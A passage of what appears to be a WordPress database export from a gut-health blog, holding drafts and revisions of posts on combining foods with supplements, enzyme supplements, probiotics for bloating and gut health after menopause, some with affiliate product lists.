  • \n\n\n\n
  • Supplement: Vitamin D3, especially for those with limited sun exposure.
  • \n\n\n\n
  • Benefits: Essential for bone health, immune function, and mood regulation.
  • \n
\n\n\n\n
    \n
  1. Probiotics:
  2. \n
\n\n\n\n
    \n
  • Food Source: Fermented foods like yogurt, kefir, sauerkraut, and kimchi.
  • \n\n\n\n
  • Supplement: High-quality probiotic capsules.
  • \n\n\n\n
  • Benefits: Supports gut health, aids digestion, and boosts immune function.
  • \n
\n\n\n\n
    \n
  1. Calcium:
  2. \n
\n\n\n\n
    \n
  • Food Source: Dairy products, leafy greens, and fortified non-dairy milk.
  • \n\n\n\n
  • Supplement: Calcium supplements for those with low dietary intake.
  • \n\n\n\n
  • Benefits: Essential for bone health and muscle function.
  • \n
\n\n\n\n
    \n
  1. Vitamin C:
  2. \n
\n\n\n\n
    \n
  • Food Source: Citrus fruits, strawberries, bell peppers, and broccoli.
  • \n\n\n\n
  • Supplement: Vitamin C capsules or tablets.
  • \n\n\n\n
  • Benefits: Boosts immune system, supports skin health, and aids wound healing.
  • \n
\n\n\n\n
    \n
  1. B Vitamins:
  2. \n
\n\n\n\n
    \n
  • Food Source: Whole grains, lean meats, nuts, and leafy greens.
  • \n\n\n\n
  • Supplement: B-complex supplements.
  • \n\n\n\n
  • Benefits: Supports energy metabolism, brain function, and overall vitality.
  • \n
\n\n\n\n
    \n
  1. Iron:
  2. \n
\n\n\n\n
    \n
  • Food Source: Lean red meat, beans, lentils, and fortified cereals.
  • \n\n\n\n
  • Supplement: Iron supplements for individuals with iron-deficiency anemia, under the guidance of a healthcare professional.
  • \n\n\n\n
  • Benefits: Essential for oxygen transport in the blood and overall energy levels.
  • \n
\n\n\n\n
    \n
  1. Multivitamin:
  2. \n
\n\n\n\n
    \n
  • Food Source: While a balanced diet provides many essential nutrients, a high-quality multivitamin can fill in any gaps in your diet.
  • \n\n\n\n
  • Supplement: Choose a reputable multivitamin that covers a broad spectrum of vitamins and minerals.
  • \n\n\n\n
  • Benefits: Ensures you get a comprehensive range of essential nutrients for overall health.
  • \n
\n\n\n\n
    \n
  1. Collagen:
  2. \n
\n\n\n\n
    \n
  • Food Source: Collagen is found in bone broth and connective tissues of animals.
  • \n\n\n\n
  • Supplement: Collagen peptides or hydrolyzed collagen supplements.
  • \n\n\n\n
  • Benefits: Supports joint health, skin elasticity, and may aid in hair and nail growth.
  • \n
\n\n\n\n
    \n
  1. Turmeric (Curcumin):
  2. \n
\n\n\n\n
    \n
  • Food Source: Turmeric is a spice commonly used in curries.
  • \n\n\n\n
  • Supplement: Curcumin capsules or extracts.
  • \n\n\n\n
  • Benefits: Anti-inflammatory properties, supports joint health, and may enhance cognitive function.
  • \n
\n\n\n\n

Remember, it\'s crucial to consult with a healthcare professional or registered dietitian before adding supplements to your routine, especially if you have specific health concerns or conditions. They can help you determine the right combination of foods and supplements tailored to your individual needs, ensuring you achieve optimal health safely and effectively.

\n','Supplements, do they really work? - How to achieve optimal health by combining food and supplements','','draft','open','open','','','','','2023-09-17 07:30:57','2023-09-17 07:30:57','',0,'https://tummyrevolution.com/?p=5596',0,'post','',0),(5592,1,'2023-09-16 06:22:45','2023-09-16 06:22:45','\n

In our quest for optimal health and well-being, the choices we make about our diet and nutritional supplements play a pivotal role. While the debate between whole foods and supplements often rages on, there is growing evidence that combining the two can offer a synergistic approach to a healthier life. Here are some compelling benefits of combining food with supplements:

\n\n\n\n
    \n
  1. Nutrient Synergy: Food is a rich source of vitamins, minerals, and other essential nutrients. When you combine these nutrients with supplements, you create a harmonious blend that can address specific nutritional deficiencies. The diverse range of nutrients in food complements the targeted approach of supplements, ensuring your body gets a well-rounded nutritional boost.
  2. \n\n\n\n
  3. Enhanced Absorption: Certain nutrients are more readily absorbed when consumed with food. For instance, fat-soluble vitamins like A, D, E, and K are better absorbed when ingested alongside dietary fats. By pairing supplements with meals, you optimize the absorption of these critical nutrients, maximizing their effectiveness.
  4. \n\n\n\n
  5. Balanced Diet Support: Achieving a balanced diet can be challenging, especially with busy lifestyles. Supplements can fill in the gaps by providing nutrients that may be lacking in your regular meals. This is particularly beneficial for individuals with dietary restrictions, allergies, or those with limited access to certain foods.
  6. \n\n\n\n
  7. Targeted Health Goals: Supplements can be tailored to address specific health goals or conditions. Whether you\'re aiming to support joint health, boost your immune system, or improve cognitive function, combining the right supplements with a well-rounded diet can help you achieve your wellness objectives more effectively.
  8. \n\n\n\n
  9. Convenience and Consistency: Life often gets in the way of maintaining a perfect diet. Supplements offer a convenient way to ensure consistent intake of essential nutrients, even when fresh, wholesome meals aren\'t readily available. They act as a safety net to prevent nutritional gaps.
  10. \n\n\n\n
  11. Aging Gracefully: As we age, our bodies may have a harder time absorbing certain nutrients from food alone. Supplements can become increasingly important in supporting overall health and vitality as we grow older, aiding in the prevention of age-related deficiencies.
  12. \n\n\n\n
  13. Customized Approach: Everyone\'s nutritional needs are unique. Combining food with supplements allows for a personalized approach to health and wellness. You can tailor your supplement regimen to suit your individual requirements, ensuring you\'re getting what you need, when you need it.
  14. \n
\n\n\n\n

In conclusion, the combination of food and supplements can be a powerful strategy for achieving and maintaining optimal health. Rather than viewing them as competing forces, consider them as allies in your journey towards wellness. Always consult with a healthcare professional or registered dietitian to determine the right supplements for your specific needs and to ensure they complement your diet effectively. When used thoughtfully and in harmony, food and supplements can help you unlock the full potential of a healthier, more vibrant life.

\n\n\n\n

Achieving optimal health and well-being often involves a balanced approach that combines nutritious foods with carefully selected supplements. Here\'s a guide to some of the best foods and supplements to consider combining for overall health:

\n\n\n\n
    \n
  1. Omega-3 Fatty Acids:
  2. \n
\n\n\n\n
    \n
  1. Food Source: Fatty fish like salmon, mackerel, and sardines.
  2. \n\n\n\n
  3. Supplement: High-quality fish oil capsules or algae-based omega-3 supplements for vegetarians and vegans.
  4. \n\n\n\n
  5. Benefits: Supports heart health, reduces inflammation, and aids cognitive function.
  6. \n
\n\n\n\n
    \n
  1. Vitamin D:
  2. \n
\n\n\n\n
    \n
  1. Food Source: Fatty fish, fortified dairy products, and egg yolks.
  2. \n\n\n\n
  3. Supplement: Vitamin D3, especially for those with limited sun exposure.
  4. \n\n\n\n
  5. Benefits: Essential for bone health, immune function, and mood regulation.
  6. \n
\n\n\n\n
    \n
  1. Probiotics:
  2. \n
\n\n\n\n
    \n
  1. Food Source: Fermented foods like yogurt, kefir, sauerkraut, and kimchi.
  2. \n\n\n\n
  3. Supplement: High-quality probiotic capsules.
  4. \n\n\n\n
  5. Benefits: Supports gut health, aids digestion, and boosts immune function.
  6. \n
\n\n\n\n
    \n
  1. Calcium:
  2. \n
\n\n\n\n
    \n
  1. Food Source: Dairy products, leafy greens, and fortified non-dairy milk.
  2. \n\n\n\n
  3. Supplement: Calcium supplements for those with low dietary intake.
  4. \n\n\n\n
  5. Benefits: Essential for bone health and muscle function.
  6. \n
\n\n\n\n
    \n
  1. Vitamin C:
  2. \n
\n\n\n\n
    \n
  1. Food Source: Citrus fruits, strawberries, bell peppers, and broccoli.
  2. \n\n\n\n
  3. Supplement: Vitamin C capsules or tablets.
  4. \n\n\n\n
  5. Benefits: Boosts immune system, supports skin health, and aids wound healing.
  6. \n
\n\n\n\n
    \n
  1. B Vitamins:
  2. \n
\n\n\n\n
    \n
  1. Food Source: Whole grains, lean meats, nuts, and leafy greens.
  2. \n\n\n\n
  3. Supplement: B-complex supplements.
  4. \n\n\n\n
  5. Benefits: Supports energy metabolism, brain function, and overall vitality.
  6. \n
\n\n\n\n
    \n
  1. Iron:
  2. \n
\n\n\n\n
    \n
  1. Food Source: Lean red meat, beans, lentils, and fortified cereals.
  2. \n\n\n\n
  3. Supplement: Iron supplements for individuals with iron-deficiency anemia, under the guidance of a healthcare professional.
  4. \n\n\n\n
  5. Benefits: Essential for oxygen transport in the blood and overall energy levels.
  6. \n
\n\n\n\n
    \n
  1. Multivitamin:
  2. \n
\n\n\n\n
    \n
  1. Food Source: While a balanced diet provides many essential nutrients, a high-quality multivitamin can fill in any gaps in your diet.
  2. \n\n\n\n
  3. Supplement: Choose a reputable multivitamin that covers a broad spectrum of vitamins and minerals.
  4. \n\n\n\n
  5. Benefits: Ensures you get a comprehensive range of essential nutrients for overall health.
  6. \n
\n\n\n\n
    \n
  1. Collagen:
  2. \n
\n\n\n\n
    \n
  1. Food Source: Collagen is found in bone broth and connective tissues of animals.
  2. \n\n\n\n
  3. Supplement: Collagen peptides or hydrolyzed collagen supplements.
  4. \n\n\n\n
  5. Benefits: Supports joint health, skin elasticity, and may aid in hair and nail growth.
  6. \n
\n\n\n\n
    \n
  1. Turmeric (Curcumin):
  2. \n
\n\n\n\n
    \n
  1. Food Source: Turmeric is a spice commonly used in curries.
  2. \n\n\n\n
  3. Supplement: Curcumin capsules or extracts.
  4. \n\n\n\n
  5. Benefits: Anti-inflammatory properties, supports joint health, and may enhance cognitive function.
  6. \n
\n\n\n\n

Remember, it\'s crucial to consult with a healthcare professional or registered dietitian before adding supplements to your routine, especially if you have specific health concerns or conditions. They can help you determine the right combination of foods and supplements tailored to your individual needs, ensuring you achieve optimal health safely and effectively.

\n','Unlocking Wellness: The Synergy of Food and Supplements','','inherit','closed','closed','','5591-revision-v1','','','2023-09-16 06:22:45','2023-09-16 06:22:45','',5591,'https://tummyrevolution.com/?p=5592',0,'revision','',0),(5597,1,'2023-09-17 07:30:54','2023-09-17 07:30:54','\n

Achieving optimal health and well-being often involves a balanced approach that combines nutritious foods with carefully selected supplements. Here\'s a guide to some of the best foods and supplements to consider combining for overall health:

\n\n\n\n
    \n
  1. Omega-3 Fatty Acids:
  2. \n
\n\n\n\n
    \n
  • Food Source: Fatty fish like salmon, mackerel, and sardines.
  • \n\n\n\n
  • Supplement: High-quality fish oil capsules or algae-based omega-3 supplements for vegetarians and vegans.
  • \n\n\n\n
  • Benefits: Supports heart health, reduces inflammation, and aids cognitive function.
  • \n
\n\n\n\n
    \n
  1. Vitamin D:
  2. \n
\n\n\n\n
    \n
  • Food Source: Fatty fish, fortified dairy products, and egg yolks.
  • \n\n\n\n
  • Supplement: Vitamin D3, especially for those with limited sun exposure.
  • \n\n\n\n
  • Benefits: Essential for bone health, immune function, and mood regulation.
  • \n
\n\n\n\n
    \n
  1. Probiotics:
  2. \n
\n\n\n\n
    \n
  • Food Source: Fermented foods like yogurt, kefir, sauerkraut, and kimchi.
  • \n\n\n\n
  • Supplement: High-quality probiotic capsules.
  • \n\n\n\n
  • Benefits: Supports gut health, aids digestion, and boosts immune function.
  • \n
\n\n\n\n
    \n
  1. Calcium:
  2. \n
\n\n\n\n
    \n
  • Food Source: Dairy products, leafy greens, and fortified non-dairy milk.
  • \n\n\n\n
  • Supplement: Calcium supplements for those with low dietary intake.
  • \n\n\n\n
  • Benefits: Essential for bone health and muscle function.
  • \n
\n\n\n\n
    \n
  1. Vitamin C:
  2. \n
\n\n\n\n
    \n
  • Food Source: Citrus fruits, strawberries, bell peppers, and broccoli.
  • \n\n\n\n
  • Supplement: Vitamin C capsules or tablets.
  • \n\n\n\n
  • Benefits: Boosts immune system, supports skin health, and aids wound healing.
  • \n
\n\n\n\n
    \n
  1. B Vitamins:
  2. \n
\n\n\n\n
    \n
  • Food Source: Whole grains, lean meats, nuts, and leafy greens.
  • \n\n\n\n
  • Supplement: B-complex supplements.
  • \n\n\n\n
  • Benefits: Supports energy metabolism, brain function, and overall vitality.
  • \n
\n\n\n\n
    \n
  1. Iron:
  2. \n
\n\n\n\n
    \n
  • Food Source: Lean red meat, beans, lentils, and fortified cereals.
  • \n\n\n\n
  • Supplement: Iron supplements for individuals with iron-deficiency anemia, under the guidance of a healthcare professional.
  • \n\n\n\n
  • Benefits: Essential for oxygen transport in the blood and overall energy levels.
  • \n
\n\n\n\n
    \n
  1. Multivitamin:
  2. \n
\n\n\n\n
    \n
  • Food Source: While a balanced diet provides many essential nutrients, a high-quality multivitamin can fill in any gaps in your diet.
  • \n\n\n\n
  • Supplement: Choose a reputable multivitamin that covers a broad spectrum of vitamins and minerals.
  • \n\n\n\n
  • Benefits: Ensures you get a comprehensive range of essential nutrients for overall health.
  • \n
\n\n\n\n
    \n
  1. Collagen:
  2. \n
\n\n\n\n
    \n
  • Food Source: Collagen is found in bone broth and connective tissues of animals.
  • \n\n\n\n
  • Supplement: Collagen peptides or hydrolyzed collagen supplements.
  • \n\n\n\n
  • Benefits: Supports joint health, skin elasticity, and may aid in hair and nail growth.
  • \n
\n\n\n\n
    \n
  1. Turmeric (Curcumin):
  2. \n
\n\n\n\n
    \n
  • Food Source: Turmeric is a spice commonly used in curries.
  • \n\n\n\n
  • Supplement: Curcumin capsules or extracts.
  • \n\n\n\n
  • Benefits: Anti-inflammatory properties, supports joint health, and may enhance cognitive function.
  • \n
\n\n\n\n

Remember, it\'s crucial to consult with a healthcare professional or registered dietitian before adding supplements to your routine, especially if you have specific health concerns or conditions. They can help you determine the right combination of foods and supplements tailored to your individual needs, ensuring you achieve optimal health safely and effectively.

\n','Supplements, do they really work? - How to achieve optimal health by combining food and supplements','','inherit','closed','closed','','5596-revision-v1','','','2023-09-17 07:30:54','2023-09-17 07:30:54','',5596,'https://tummyrevolution.com/?p=5597',0,'revision','',0),(5598,1,'2023-10-10 12:38:51','0000-00-00 00:00:00','\n

In the quest for optimal health, we often uncover hidden gems from nature that offer remarkable benefits. One such gem is enzyme supplements, which have gained attention for their potential to transform the way our bodies digest and absorb nutrients. In this article, we\'ll delve into the benefits of taking enzyme supplements and how they can contribute to improved digestion, gut health, and overall well-being. To see top 5 recommended Enzyme supplements click here

\n\n\n\n
    \n
  1. Enhanced Digestion
  2. \n
\n\n\n\n

Enzymes are the unsung heroes of digestion, responsible for breaking down the foods we eat into smaller, absorbable molecules. Enzyme supplements offer a helping hand to our digestive system, ensuring that complex carbohydrates, proteins, and fats are properly broken down. This results in reduced discomfort after meals and a smoother digestion process.

\n\n\n\n
    \n
  1. Reduced Digestive Discomfort
  2. \n
\n\n\n\n

If you\'ve ever experienced bloating, gas, or indigestion after eating, enzyme supplements might offer the relief you seek. These supplements can help prevent undigested food from fermenting in the gut, leading to fewer uncomfortable symptoms. Whether you\'re dealing with lactose intolerance or sensitivity to specific foods, enzyme supplements can make a noticeable difference.

\n\n\n\n
    \n
  1. Optimized Nutrient Absorption
  2. \n
\n\n\n\n

Taking enzyme supplements can lead to improved nutrient absorption, allowing your body to extract more goodness from the foods you consume. When nutrients are properly broken down into smaller units, they can be readily absorbed through the intestinal lining, ensuring you get the most out of your meals.

\n\n\n\n
    \n
  1. Balanced Gut Health
  2. \n
\n\n\n\n

A harmonious gut environment is vital for overall well-being. Certain enzyme supplements, such as proteolytic enzymes, can support a healthy gut ecosystem by breaking down potentially harmful proteins. By promoting a balanced gut flora, these enzymes contribute to better digestion, a stronger immune system, and improved gut comfort.

\n\n\n\n
    \n
  1. Reduced Inflammation
  2. \n
\n\n\n\n

Enzymes possess anti-inflammatory properties that can help modulate the body\'s immune response. This benefit is particularly relevant for those dealing with inflammatory conditions. Enzyme supplements can aid in reducing inflammation, supporting the body\'s natural healing processes.

\n\n\n\n
    \n
  1. Support for Active Lifestyles
  2. \n
\n\n\n\n

For athletes and active individuals, enzyme supplements can play a vital role in recovery and performance. Proteolytic enzymes, in particular, aid in muscle repair and reduce post-workout muscle soreness. By facilitating quicker recovery, enzyme supplements can keep you feeling at your best, even after intense exercise.

\n\n\n\n
    \n
  1. Aging Gracefully
  2. \n
\n\n\n\n

As we age, our natural enzyme production may decline, impacting digestion and nutrient absorption. Enzyme supplements can provide a helping hand by ensuring that essential nutrients are properly broken down and absorbed. This can contribute to better energy levels and overall vitality.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

Top rated and recommended enzyme supplements

\n\n\n\n

\n\n\n\n

Enzymedica Digest Gold +ATPro, Maximum Strength Formula 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes - Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health and Bloating Relief, Enzymes for Digestion and Gut Health - 180 Count

\n\n\n\n\"\"\n\n\n\n

NOW Supplements, Super Enzymes, 90 Capsules

\n\n\n\n\"\"\n\n\n\n

Physician\'s CHOICE Digestive Enzymes, Powerful Enzymes, Organic Prebiotics & Probiotics for Digestive Health & Gut Health, 60 CT

\n\n\n\n\"\"\n\n\n\n

Pure Encapsulations Digestive Enzymes Ultra, 90 Capsules

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

Enzyme supplements offer a holistic approach to improved digestion, better gut health, and overall wellness. By providing your body with the tools it needs to break down and absorb nutrients effectively, you can experience reduced digestive discomfort, enhanced nutrient absorption, and a healthier gut environment. As with any supplement, it\'s important to consult with a healthcare professional before incorporating enzyme supplements into your routine. With their guidance, you can unlock the benefits of these natural catalysts and embark on a journey to better digestion and a happier, healthier you.

\n','Unveiling the Power of Enzyme Supplements: A Path to Better Digestion and Health','','draft','open','open','','','','','2023-10-10 12:38:51','2023-10-10 12:38:51','',0,'https://tummyrevolution.com/?p=5598',0,'post','',0),(5599,1,'2023-09-17 07:41:49','2023-09-17 07:41:49','How to achieve better gut health with the help of enzymes ','Enzymes','Better gut health with enzymes','inherit','open','closed','','enzymes','','','2023-09-17 07:42:59','2023-09-17 07:42:59','',5598,'http://tummyrevolution.com/wp-content/uploads/2023/09/Enzymes.jpg',0,'attachment','image/jpeg',0),(5600,1,'2023-09-17 07:44:31','2023-09-17 07:44:31','\n

In the quest for optimal health, we often uncover hidden gems from nature that offer remarkable benefits. One such gem is enzyme supplements, which have gained attention for their potential to transform the way our bodies digest and absorb nutrients. In this article, we\'ll delve into the benefits of taking enzyme supplements and how they can contribute to improved digestion, gut health, and overall well-being.

\n\n\n\n
    \n
  1. Enhanced Digestion
  2. \n
\n\n\n\n

Enzymes are the unsung heroes of digestion, responsible for breaking down the foods we eat into smaller, absorbable molecules. Enzyme supplements offer a helping hand to our digestive system, ensuring that complex carbohydrates, proteins, and fats are properly broken down. This results in reduced discomfort after meals and a smoother digestion process.

\n\n\n\n
    \n
  1. Reduced Digestive Discomfort
  2. \n
\n\n\n\n

If you\'ve ever experienced bloating, gas, or indigestion after eating, enzyme supplements might offer the relief you seek. These supplements can help prevent undigested food from fermenting in the gut, leading to fewer uncomfortable symptoms. Whether you\'re dealing with lactose intolerance or sensitivity to specific foods, enzyme supplements can make a noticeable difference.

\n\n\n\n
    \n
  1. Optimized Nutrient Absorption
  2. \n
\n\n\n\n

Taking enzyme supplements can lead to improved nutrient absorption, allowing your body to extract more goodness from the foods you consume. When nutrients are properly broken down into smaller units, they can be readily absorbed through the intestinal lining, ensuring you get the most out of your meals.

\n\n\n\n
    \n
  1. Balanced Gut Health
  2. \n
\n\n\n\n

A harmonious gut environment is vital for overall well-being. Certain enzyme supplements, such as proteolytic enzymes, can support a healthy gut ecosystem by breaking down potentially harmful proteins. By promoting a balanced gut flora, these enzymes contribute to better digestion, a stronger immune system, and improved gut comfort.

\n\n\n\n
    \n
  1. Reduced Inflammation
  2. \n
\n\n\n\n

Enzymes possess anti-inflammatory properties that can help modulate the body\'s immune response. This benefit is particularly relevant for those dealing with inflammatory conditions. Enzyme supplements can aid in reducing inflammation, supporting the body\'s natural healing processes.

\n\n\n\n
    \n
  1. Support for Active Lifestyles
  2. \n
\n\n\n\n

For athletes and active individuals, enzyme supplements can play a vital role in recovery and performance. Proteolytic enzymes, in particular, aid in muscle repair and reduce post-workout muscle soreness. By facilitating quicker recovery, enzyme supplements can keep you feeling at your best, even after intense exercise.

\n\n\n\n
    \n
  1. Aging Gracefully
  2. \n
\n\n\n\n

As we age, our natural enzyme production may decline, impacting digestion and nutrient absorption. Enzyme supplements can provide a helping hand by ensuring that essential nutrients are properly broken down and absorbed. This can contribute to better energy levels and overall vitality.

\n\n\n\n

Conclusion

\n\n\n\n

Enzyme supplements offer a holistic approach to improved digestion, better gut health, and overall wellness. By providing your body with the tools it needs to break down and absorb nutrients effectively, you can experience reduced digestive discomfort, enhanced nutrient absorption, and a healthier gut environment. As with any supplement, it\'s important to consult with a healthcare professional before incorporating enzyme supplements into your routine. With their guidance, you can unlock the benefits of these natural catalysts and embark on a journey to better digestion and a happier, healthier you.

\n','Unveiling the Power of Enzyme Supplements: A Path to Better Digestion and Health','','inherit','closed','closed','','5598-revision-v1','','','2023-09-17 07:44:31','2023-09-17 07:44:31','',5598,'https://tummyrevolution.com/?p=5600',0,'revision','',0),(5601,1,'2023-10-12 09:00:03','0000-00-00 00:00:00','\n

Probiotics are live microorganisms that can provide a wide range of health benefits when consumed in adequate amounts. Most famously, they\'re known for promoting a balanced gut microbiome, which is crucial for good digestion and overall well-being. (SKIP straight to list of Top recommended Probiotics HERE)

\n\n\n\n

So, how do these tiny warriors work their magic to combat gas and bloating?

\n\n\n\n
    \n
  1. Balancing the Microbiome: Probiotics introduce beneficial bacteria into your gut, helping to balance the ratio of good to bad microbes. This balance can enhance the efficiency of your digestive system.
  2. \n\n\n\n
  3. Reducing Inflammation: Some probiotic strains have anti-inflammatory properties, which can help soothe an irritated gut and reduce bloating.
  4. \n\n\n\n
  5. Breaking Down Complex Sugars: Certain probiotic strains, such as Lactobacillus and Bifidobacterium, can assist in breaking down complex carbohydrates that might otherwise cause gas and bloating.
  6. \n
\n\n\n\n

Choosing the Right Probiotics

\n\n\n\n

While it\'s tempting to grab the first probiotic supplement you see, it\'s essential to select the right one for your specific needs. Here are some tips:

\n\n\n\n
    \n
  1. Check the Strains: Different probiotic strains have varying effects on digestive health. Look for strains like Lactobacillus and Bifidobacterium, which have shown promise in reducing gas and bloating.
  2. \n\n\n\n
  3. CFUs Matter: Colony-forming units (CFUs) indicate the number of viable bacteria in a probiotic supplement. Consult your healthcare provider for personalised recommendations.
  4. \n\n\n\n
  5. Dietary Sources: Probiotics are also found in fermented foods like yogurt, kefir, sauerkraut, and kimchi. Incorporating these foods into your diet can be a delicious way to support your gut health.
  6. \n
\n\n\n\n

Conclusion: The Promise of Probiotics

\n\n\n\n

While there\'s no one-size-fits-all solution to digestive issues, probiotics offer a promising avenue for relief from gas and bloating. Remember that results may vary from person to person, so it\'s crucial to consult with a healthcare professional before starting any new supplement regimen.

\n\n\n\n

Whether you choose to harness the power of probiotics or explore other avenues for digestive health, remember that a happier gut often leads to a happier you. So, embark on this journey toward digestive bliss, and may your days of discomfort be nothing more than a distant memory. Your gut—and your body—will thank you!

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Multi Probiotics to improve your gut and general health:

\n\n\n\n

Ritual Synbiotic+: Probiotic, Prebiotic, Postbiotic, 3-in-1 Formula for Gut Health, Bloat Support, Immune Support, Delayed-Released Capsule Designed to Thrive, 30 Vegan Capsules

\n\n\n\n\"\"\n\n\n\n

DrFormulas Nexabiotic 23 Multi Probiotic for Women and Men - Dr. formulated with Lactobacillus Acidophilus, Bifidobacterium Infantis, Saccharomyces Boulardii, 17.25 Billion CFUs

\n\n\n\n\"\"\n\n\n\n

Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Bio-Kult Advanced Probiotics -14 Strains, Probiotic Supplement for Adults, Lactobacillus Acidophilus, No Need for Refrigeration, Non-GMO, Gluten Free -Capsules,120 Count

\n\n\n\n\"\"\n\n\n\n

Inessa Advanced Daily Biotic, Probiotics Lactobacillus Rhamnosus, Powerful Digestive Support Probiotics with 10 Billion CFU, Globally Superior Strain, 60 Vegan Capsules for Men & Women

\n\n\n\n\"\"\n\n\n\n

Optibac Probiotics for Daily Wellbeing - Pack of 30 Capsules

\n\n\n\n\"\"\n','Probiotics: The Friendly Gut Warriors','','draft','open','open','','','','','2023-10-12 09:00:03','2023-10-12 09:00:03','',0,'https://tummyrevolution.com/?p=5601',0,'post','',0),(5602,1,'2023-09-17 08:10:28','2023-09-17 08:10:28','Understanding probiotics','Best Probiotics','How probiotics work','inherit','open','closed','','probiotics','','','2023-10-12 08:59:53','2023-10-12 08:59:53','',5601,'http://tummyrevolution.com/wp-content/uploads/2023/09/PRobiotics.jpg',0,'attachment','image/jpeg',0),(5603,1,'2023-09-17 08:11:55','2023-09-17 08:11:55','\n

Probiotics are live microorganisms that can provide a wide range of health benefits when consumed in adequate amounts. Most famously, they\'re known for promoting a balanced gut microbiome, which is crucial for good digestion and overall well-being.

\n\n\n\n

So, how do these tiny warriors work their magic to combat gas and bloating?

\n\n\n\n
    \n
  1. Balancing the Microbiome: Probiotics introduce beneficial bacteria into your gut, helping to balance the ratio of good to bad microbes. This balance can enhance the efficiency of your digestive system.
  2. \n\n\n\n
  3. Reducing Inflammation: Some probiotic strains have anti-inflammatory properties, which can help soothe an irritated gut and reduce bloating.
  4. \n\n\n\n
  5. Breaking Down Complex Sugars: Certain probiotic strains, such as Lactobacillus and Bifidobacterium, can assist in breaking down complex carbohydrates that might otherwise cause gas and bloating.
  6. \n
\n\n\n\n

Choosing the Right Probiotics

\n\n\n\n

While it\'s tempting to grab the first probiotic supplement you see, it\'s essential to select the right one for your specific needs. Here are some tips:

\n\n\n\n
    \n
  1. Check the Strains: Different probiotic strains have varying effects on digestive health. Look for strains like Lactobacillus and Bifidobacterium, which have shown promise in reducing gas and bloating.
  2. \n\n\n\n
  3. CFUs Matter: Colony-forming units (CFUs) indicate the number of viable bacteria in a probiotic supplement. Higher CFUs are generally better, but consult your healthcare provider for personalized recommendations.
  4. \n\n\n\n
  5. Dietary Sources: Probiotics are also found in fermented foods like yogurt, kefir, sauerkraut, and kimchi. Incorporating these foods into your diet can be a delicious way to support your gut health.
  6. \n
\n\n\n\n

Conclusion: The Promise of Probiotics

\n\n\n\n

While there\'s no one-size-fits-all solution to digestive issues, probiotics offer a promising avenue for relief from gas and bloating. Remember that results may vary from person to person, so it\'s crucial to consult with a healthcare professional before starting any new supplement regimen.

\n\n\n\n

Whether you choose to harness the power of probiotics or explore other avenues for digestive health, remember that a happier gut often leads to a happier you. So, embark on this journey toward digestive bliss, and may your days of discomfort be nothing more than a distant memory. Your gut—and your body—will thank you!

\n','Probiotics: The Friendly Gut Warriors','','inherit','closed','closed','','5601-revision-v1','','','2023-09-17 08:11:55','2023-09-17 08:11:55','',5601,'https://tummyrevolution.com/?p=5603',0,'revision','',0),(5604,1,'2023-09-17 11:36:58','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2023-09-17 11:36:58','0000-00-00 00:00:00','',0,'https://tummyrevolution.com/?p=5604',1,'nav_menu_item','',0),(5606,3,'2023-09-17 14:21:24','2023-09-17 14:21:24','\n

Women transition through menopause, they experience a range of physical and hormonal changes that can impact various aspects of their health, including gut health. Maintaining a balanced and healthy gut becomes even more crucial during this phase, as it can help alleviate digestive issues and contribute to overall well-being. In this blog, we\'ll explore the connection between menopause and gut health and provide actionable strategies to improve and maintain gut health post-menopause.

\n\n\n\n

The Menopause-Gut Health Connection
The gut microbiome plays a vital role in digestion, nutrient absorption, immune function, and even mood regulation. During menopause, hormonal fluctuations can disrupt the delicate balance of the gut microbiota, potentially leading to digestive problems such as bloating, constipation, and increased gas. Additionally, shifts in hormones can influence gut sensitivity, potentially exacerbating conditions like irritable bowel syndrome (IBS).

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

Strategies to Improve Gut health After Menopause

\n\n\n\n
    \n
  1. Prioritize Fiber-Rich Foods:
  2. \n\n\n\n
  3. Include a variety of fiber-rich foods such as whole grains, fruits, vegetables, legumes, and nuts in your diet. Fiber promotes regular bowel movements, supports the growth of beneficial gut bacteria, and helps maintain a healthy gut lining.
  4. \n\n\n\n
  5. Stay Hydrated:
  6. \n\n\n\n
  7. Drinking an adequate amount of water supports healthy digestion, prevents constipation, and aids in the absorption of nutrients. Aim for at least 8 glasses of water per day.
  8. \n\n\n\n
  9. Incorporate Probiotics:
  10. \n\n\n\n
  11. Probiotics are beneficial bacteria that can enhance gut health. You can find probiotics in fermented foods like yogurt, kefir, sauerkraut, kimchi, and kombucha. Alternatively, consider taking a high-quality probiotic supplement after consulting your healthcare provider.
  12. \n\n\n\n
  13. Choose Prebiotic Foods:
  14. \n\n\n\n
  15. Prebiotics are non-digestible fibers that nourish beneficial gut bacteria. Foods like garlic, onions, leeks, asparagus, and bananas are rich in prebiotics and can support a diverse and healthy gut microbiome.
  16. \n\n\n\n
  17. Minimize Processed Foods and Sugar:
  18. \n\n\n\n
  19. High intake of processed foods and added sugars can negatively affect gut health by promoting the growth of harmful bacteria. Focus on whole, unprocessed foods to support a balanced microbiome.
  20. \n
\n\n\n\n

Manage Stress:

\n\n\n\n
    \n
  • Chronic stress can disrupt the gut-brain connection and impact gut health. Engage in stress-reduction techniques such as meditation, deep breathing, yoga, or mindfulness to support both mental well-being and gut health.
  • \n\n\n\n
  • Regular Physical Activity:
  • \n\n\n\n
  • Exercise has been shown to positively influence gut health by promoting the growth of beneficial bacteria. Aim for regular moderate-intensity activities like walking, swimming, or cycling.
  • \n\n\n\n
  • Limit Alcohol and Caffeine:
  • \n\n\n\n
  • Excessive alcohol and caffeine consumption can irritate the gut lining and disrupt gut balance. Moderation is key to maintaining gut health.
  • \n\n\n\n
  • Avoid Antibiotic Overuse:
  • \n\n\n\n
  • While antibiotics are sometimes necessary, overuse can disturb the gut microbiome. Discuss alternatives and potential probiotic supplementation with your healthcare provider when taking antibiotics.
  • \n\n\n\n
  • Consult a Professional:
  • \n\n\n\n
  • If you\'re experiencing persistent gut issues, consider consulting a registered dietitian or healthcare provider who can offer personalized advice and recommendations.
  • \n
\n\n\n\n

